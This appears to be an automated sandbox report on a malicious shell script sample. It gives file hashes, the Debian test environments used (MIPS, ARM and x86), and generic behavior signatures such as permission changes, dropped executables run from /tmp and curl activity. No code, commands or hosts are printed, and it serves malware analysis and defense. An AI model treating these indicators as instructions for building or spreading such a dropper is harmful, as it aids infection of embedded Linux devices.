Analysis
-
max time kernel
67s -
max time network
95s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipsel image:debian9-mipsel-20240729-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
18/10/2024, 02:42
Static task
static1
Behavioral task
behavioral1
Sample
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
-
Size
10KB
-
MD5
91ccaeb90f7a1a486a1a1cc72526a2c5
-
SHA1
f4eae2ed37483fd578a41a4edaa29af24ebe85be
-
SHA256
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3
-
SHA512
beb4e0fafb2bc99022e6595d1f0d0e57cd49ae6da6196c900d45f9b3405d9b6a256070fdaf21fff922ed583c8021f0625d81a56fe82e4c7c28ecf1a5578e2d21
-
SSDEEP
192:mploN9In4UdM0DP0B51+JJRzBKOKBiyaploN9s4UdM0XOKBiyX51+JJv7:mploN9In4UdM0DP0EzBBploN9s4UdM0+
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97